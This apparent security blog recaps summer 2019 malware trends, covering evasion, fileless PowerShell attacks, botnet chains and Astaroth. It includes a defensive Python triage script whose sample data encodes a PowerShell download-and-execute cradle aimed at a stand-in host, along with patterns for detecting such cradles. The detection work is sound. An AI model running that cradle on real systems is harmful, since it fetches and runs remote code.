It’s been a summer of ransomware hold-ups, supply chain attacks and fileless attacks flying under the radar of old-school security. With malware running amok while we were lying on the beach, here’s a recap of the most burning strains and trends seen in the wild during the months of July and August 2019.
Malware Evolution Trends
The heat must have had an effect as this summer saw malware continuing to evolve, particularly around three core trends:
Malware has been increasingly designed to bypass security controls leveraging a host of tactics, most notably by:
- Changing hashes via file obfuscation to evade AVs.
- Using encrypted communication with C2 servers to foil EDRs.
- Using feature manipulation and tampering to trick AI and machine-learning engines, and evading sandboxes by detecting such environments and deliberately delaying execution.
Fileless Attacks and Living-Off-The-Land (LOTL)
Taking evasion one step further, a growing number of strains leverage PowerShell commands and masquerade as legitimate system tools, all while running entirely from memory (RAM). This lets them fly under the radar of traditional IoC-based solutions, and detecting them requires behavior-based analysis.
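As an added illustration of the behavior-based analysis mentioned above (example code written for this recap, not Cymulate's own tooling), the snippet below triages constructed process-creation events for the traits described: encoded PowerShell, hidden windows, in-memory download cradles, Office spawning PowerShell, and a system-binary name running from a non-system directory. The event fields, paths and the `c2.example` host are all hypothetical.

```python
"""Behavior-based triage of process-creation events for fileless / LOTL PowerShell."""
import base64
import re

# Constructed sample events (hypothetical telemetry, not real data).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/a')".encode("utf-16-le")
).decode()
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"id": 2, "image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

SYSTEM_BINARIES = {"powershell.exe", "svchost.exe", "rundll32.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Download-and-execute-in-memory cradle markers (no file touches disk).
MEMORY_ONLY = re.compile(r"(IEX|Invoke-Expression|DownloadString|FromBase64String)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload behind -e/-enc/-EncodedCommand, or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Score one event by the number of LOTL behaviors seen; returns (score, reasons)."""
    reasons, image, cmd = [], event["image"].lower(), event["cmdline"]
    name = image.rsplit("\\", 1)[-1]
    if name in SYSTEM_BINARIES and not image.startswith(r"c:\windows\system32"):
        reasons.append(f"{name} masquerading from {event['image']}")  # wrong directory
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        cmd = cmd + " " + decoded  # inspect the decoded script too
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    if MEMORY_ONLY.search(cmd):
        reasons.append("in-memory download/execute cradle")
    if event["parent"].lower().rsplit("\\", 1)[-1] in OFFICE_APPS and "powershell" in name:
        reasons.append("PowerShell spawned by an Office application")
    return len(reasons), reasons


def triage_all(events=EVENTS):
    """Map event id -> score for a batch of events."""
    return {e["id"]: triage(e)[0] for e in events}
```

Running `triage_all()` scores the Office-spawned encoded cradle highest, the misplaced `svchost.exe` next, and the scheduled backup script as zero, which is the ordering an analyst would expect.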
(Jack-in-the-box)² or Jack-in-the-box, Squared
Courtesy of underground botnet-as-a-service businesses, whole botnets of compromised systems are rented out to attackers, who use this ready-made access to live, healthy systems to unleash multiple malware strains at once. For example, Emotet serving IcedID (Bokbot), followed by Trickbot or the Ryuk ransomware.
Deadliest Immediate Threats
What were this summer’s most exotic and lethal malware strains? Here’s a roundup.
Astaroth Malware Uses Living-Off-The-Land (LOTL) Techniques
Targeting European and Brazilian organizations, and posing an immediate threat to 76% of the organizations that tested their resilience to it (according to the Cymulate Research Lab), the fileless Astaroth malware evades traditional IoC-based security controls and steals user credentials along with PII, system and financial data.